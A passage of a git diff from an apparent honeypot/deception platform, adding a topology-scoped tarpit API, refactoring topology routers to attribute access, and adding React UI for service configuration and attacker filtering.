frontend + # discriminates them from topology-lifecycle events that happen to + # share an event name (e.g. ``status``). + if head == _topics.DECKY: + return f"{_topics.DECKY}.{tail}" + return tail diff --git a/decnet/web/router/topology/api_lan_crud.py b/decnet/web/router/topology/api_lan_crud.py index ae15d394..9a4d9899 100644 --- a/decnet/web/router/topology/api_lan_crud.py +++ b/decnet/web/router/topology/api_lan_crud.py @@ -73,11 +73,11 @@ async def api_create_lan( raise map_repo_exception(exc) from exc rows = await repo.list_lans_for_topology(topology_id) - row = next((r for r in rows if r["id"] == lan_id), None) + row = next((r for r in rows if r.id == lan_id), None) if row is None: # pragma: no cover — would mean insert vanished raise HTTPException(status_code=500, detail="LAN insert vanished") - return LANRow(**row) + return row @router.patch( @@ -115,10 +115,10 @@ async def api_update_lan( raise HTTPException(status_code=404, detail=str(exc)) from exc rows = await repo.list_lans_for_topology(topology_id) - row = next((r for r in rows if r["id"] == lan_id), None) + row = next((r for r in rows if r.id == lan_id), None) if row is None: raise HTTPException(status_code=404, detail="LAN not found") - return LANRow(**row) + return row @router.delete( @@ -142,7 +142,7 @@ async def api_delete_lan( await assert_pending_or_409(topology_id) rows = await repo.list_lans_for_topology(topology_id) - if not any(r["id"] == lan_id for r in rows): + if not any(r.id == lan_id for r in rows): raise HTTPException(status_code=404, detail="LAN not found") try: diff --git a/decnet/web/router/topology/api_mutations.py b/decnet/web/router/topology/api_mutations.py index d0f4cf4b..299bfea3 100644 --- a/decnet/web/router/topology/api_mutations.py +++ b/decnet/web/router/topology/api_mutations.py @@ -63,11 +63,11 @@ async def api_enqueue_mutation( _admin: dict = Depends(require_admin), ) -> MutationEnqueueResponse: topo = await get_topology_or_404(topology_id) - if topo["status"] not in _MUTATABLE: + if topo.status not in _MUTATABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; the mutation queue is " + f"Topology is {topo.status!r}; the mutation queue is " f"only open for 'active' or 'degraded' topologies. Use " f"child-CRUD endpoints while pending." ), diff --git a/decnet/web/router/topology/api_personas.py b/decnet/web/router/topology/api_personas.py index e2f6ea13..b18eee30 100644 --- a/decnet/web/router/topology/api_personas.py +++ b/decnet/web/router/topology/api_personas.py @@ -54,13 +54,13 @@ async def list_topology_personas( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - language_default = topo.get("language_default") or "en" + language_default = topo.language_default or "en" personas = parse_personas( - topo.get("email_personas"), language_default=language_default, + topo.email_personas, language_default=language_default, ) return { "topology_id": topology_id, - "topology_name": topo.get("name", ""), + "topology_name": topo.name, "language_default": language_default, "personas": _serialize(personas), } @@ -100,7 +100,7 @@ async def replace_topology_personas( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - language_default = topo.get("language_default") or "en" + language_default = topo.language_default or "en" parsed = parse_personas(raw, language_default=language_default) if raw and not parsed: @@ -125,7 +125,7 @@ async def replace_topology_personas( ) return { "topology_id": topology_id, - "topology_name": topo.get("name", ""), + "topology_name": topo.name, "language_default": language_default, "personas": serialized, } diff --git a/decnet/web/router/topology/api_tarpit.py b/decnet/web/router/topology/api_tarpit.py new file mode 100644 index 00000000..a65c9935 --- /dev/null +++ b/decnet/web/router/topology/api_tarpit.py @@ -0,0 +1,201 @@ +"""POST/GET/DELETE /api/v1/topologies/{topology_id}/deckies/{decky_name}/tarpit + +Same tc netem logic as the fleet tarpit, but scoped to a MazeNET topology. +Container name is resolved via resolve_decky_container so the SSH-suffix / +decnet_t_ convention is handled transparently. + +Auth: require_admin for write operations, require_viewer for GET. +""" +from __future__ import annotations + +import asyncio +import json + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.decky_io.resolve import resolve_decky_container +from decnet.logging import get_logger +from decnet.network import get_container_pid, get_container_veth +from decnet.web.db.models import ( + MessageResponse, + TarpitEnableRequest, + TarpitRuleResponse, + TarpitStatusResponse, +) +from decnet.web.dependencies import repo, require_admin, require_viewer +from decnet.web.router.deckies.api_tarpit import ( + _apply_tarpit, + _get_active_connections, + _remove_tarpit, +) + +log = get_logger("api.topology.tarpit") + +_TOPO_RE = r"^[a-zA-Z0-9\-]{1,64}$" +_DECKY_RE = r"^[a-z0-9\-]{1,64}$" + +router = APIRouter( + prefix="/{topology_id}/deckies/{decky_name}/tarpit", + tags=["Topologies"], +) + + +def _db_key(topology_id: str, decky_name: str) -> str: + """Namespace topology tarpit rules away from fleet rules.""" + return f"t:{topology_id}:{decky_name}" + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found in topology"}, + 409: {"description": "tc command failed (qdisc already exists or container unreachable)"}, + }, +) +async def api_enable_tarpit( + topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + req: TarpitEnableRequest = ..., # type: ignore[assignment] + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + veth = await asyncio.to_thread(get_container_veth, container) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_apply_tarpit, veth, req.ports, req.delay_ms) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + db_key = _db_key(topology_id, decky_name) + ports_json = json.dumps(req.ports) + await repo.set_tarpit_rule({ + "decky_name": db_key, + "ports": ports_json, + "delay_ms": req.delay_ms, + "created_by": admin.get("uuid", "unknown"), + }) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_enabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit enabled topology={topology_id} decky={decky_name}" + f" ports={req.ports} delay={req.delay_ms}ms" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "topology_id": topology_id, + "ports": req.ports, + "delay_ms": req.delay_ms, + "veth": veth, + "container": container, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit enabled topology=%s decky=%s ports=%s delay_ms=%d veth=%s by=%s", + topology_id, decky_name, req.ports, req.delay_ms, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit active") + + +@router.get( + "", + response_model=TarpitStatusResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "No active tarpit rule for this decky"}, + }, +) +async def api_get_tarpit( + topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + viewer: dict = Depends(require_viewer), +) -> TarpitStatusResponse: + db_key = _db_key(topology_id, decky_name) + rule = await repo.get_tarpit_rule(db_key) + if rule is None: + raise HTTPException(status_code=404, detail="No active tarpit rule for this decky") + + conns: list[dict] = [] + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + pid = await asyncio.to_thread(get_container_pid, container) + raw_conns = await asyncio.to_thread(_get_active_connections, pid, rule["ports"]) + for c in raw_conns: + conns.append({"ip": c["ip"], "port": c["port"]}) + except LookupError: + pass + + return TarpitStatusResponse( + rule=TarpitRuleResponse(**{**rule, "decky_name": decky_name}), + active_connections=conns, + ) + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky container not found"}, + 409: {"description": "tc teardown failed"}, + }, +) +async def api_disable_tarpit( + topology_id: str = Path(..., pattern=_TOPO_RE), + decky_name: str = Path(..., pattern=_DECKY_RE), + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + container = await resolve_decky_container(repo, decky_name, topology_id=topology_id) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + veth = await asyncio.to_thread(get_container_veth, container) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_remove_tarpit, veth) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + db_key = _db_key(topology_id, decky_name) + await repo.delete_tarpit_rule(db_key) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_disabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit disabled topology={topology_id} decky={decky_name}" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "topology_id": topology_id, + "veth": veth, + "container": container, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit disabled topology=%s decky=%s veth=%s by=%s", + topology_id, decky_name, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit removed") diff --git a/decnet/web/router/topology/api_teardown_topology.py b/decnet/web/router/topology/api_teardown_topology.py index db7e461f..44e4d626 100644 --- a/decnet/web/router/topology/api_teardown_topology.py +++ b/decnet/web/router/topology/api_teardown_topology.py @@ -66,11 +66,11 @@ async def api_teardown_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] not in _TEARDOWNABLE: + if topo.status not in _TEARDOWNABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; cannot teardown " + f"Topology is {topo.status!r}; cannot teardown " f"(allowed from: {sorted(_TEARDOWNABLE)})." ), ) diff --git a/decnet_web/src/components/AddServiceConfigModal.tsx b/decnet_web/src/components/AddServiceConfigModal.tsx new file mode 100644 index 00000000..b4bcfaf1 --- /dev/null +++ b/decnet_web/src/components/AddServiceConfigModal.tsx @@ -0,0 +1,120 @@ +import React, { useEffect, useState } from 'react'; +import api from '../utils/api'; +import Modal from './Modal/Modal'; +import ServiceConfigFields, { + type FormState as SvcFormState, + type ServiceConfigFieldDTO as SvcFieldDTO, + type SchemaResponse, + buildInitial as svcBuildInitial, + compactPayload as svcCompactPayload, + fmtSchemaError, +} from './ServiceConfigFields'; + +interface Props { + /** When non-null, modal is open for this {decky, slug}. */ + pending: { deckyName: string; slug: string } | null; + /** Operator dismissed the modal without adding. */ + onCancel: () => void; + /** User confirmed (or schema is empty — auto-confirm path). */ + onConfirm: (deckyName: string, slug: string, config: Record) => Promise; +} + +const AddServiceConfigModal: React.FC = ({ pending, onCancel, onConfirm }) => { + const [schema, setSchema] = useState(null); + const [state, setState] = useState({}); + const [busy, setBusy] = useState(false); + const [err, setErr] = useState(null); + + const slug = pending?.slug ?? null; + const deckyName = pending?.deckyName ?? null; + + // Reset on slug change so leftover state from a previous open doesn't + // bleed through into a different service's form. + useEffect(() => { + setSchema(null); + setState({}); + setBusy(false); + setErr(null); + if (!slug || !deckyName) return; + let cancelled = false; + api.get(`/topologies/services/${encodeURIComponent(slug)}/schema`) + .then(({ data }) => { + if (cancelled) return; + setSchema(data); + // Empty schema → no operator decision to make; fire immediately + // and close. The caller's onConfirm handles the POST. + if (data.fields.length === 0) { + onConfirm(deckyName, slug, {}).catch(() => { /* caller surfaces */ }); + return; + } + setState(svcBuildInitial(data.fields, {})); + }) + .catch((loadErr) => { + if (cancelled) return; + setErr(fmtSchemaError(loadErr, 'Schema load failed.')); + }); + return () => { cancelled = true; }; + }, [slug, deckyName, onConfirm]); + + // Don't render anything while we're auto-confirming an empty-schema add — + // saves the brief flash of an empty modal. + if (!pending) return null; + if (schema && schema.fields.length === 0) return null; + + const fields: SvcFieldDTO[] = schema?.fields ?? []; + + const submit = async () => { + if (!schema || !slug || !deckyName) return; + setBusy(true); + setErr(null); + try { + const compact = svcCompactPayload(fields, state); + await onConfirm(deckyName, slug, compact); + } catch (e) { + const msg = (e as { response?: { data?: { detail?: string } } })?.response?.data?.detail + ?? 'Add failed.'; + setErr(msg); + } finally { + setBusy(false); + } + }; + + return ( + { /* ignore close-during-busy */ } : onCancel} + title={slug ? `ADD ${slug.toUpperCase()}` : 'ADD SERVICE'} + accent="violet" + footer={ + <> + + + + } + > +
+ {!schema && !err &&
Loading schema…
} + {err &&
{err}
} + {schema && slug && fields.length > 0 && ( + + )} +
+
+ ); +}; + +export default AddServiceConfigModal; diff --git a/decnet_web/src/components/AttackerDetail.tsx b/decnet_web/src/components/AttackerDetail.tsx index 124bbf57..88257903 100644 --- a/decnet_web/src/components/AttackerDetail.tsx +++ b/decnet_web/src/components/AttackerDetail.tsx @@ -1479,7 +1479,7 @@ const AttackerDetail: React.FC = () => { } return ( -
+
{/* Back Button */} + {(['active', 'passive', 'inactive'] as ActivityTier[]).map(tier => ( + + ))} +
+ {countries.length > 0 && ( +
+ {countries.map(cc => ( + + ))} +
+ )} +
+
@@ -160,6 +228,16 @@ const Attackers: React.FC = () => { )}
+
Page {page} of {totalPages}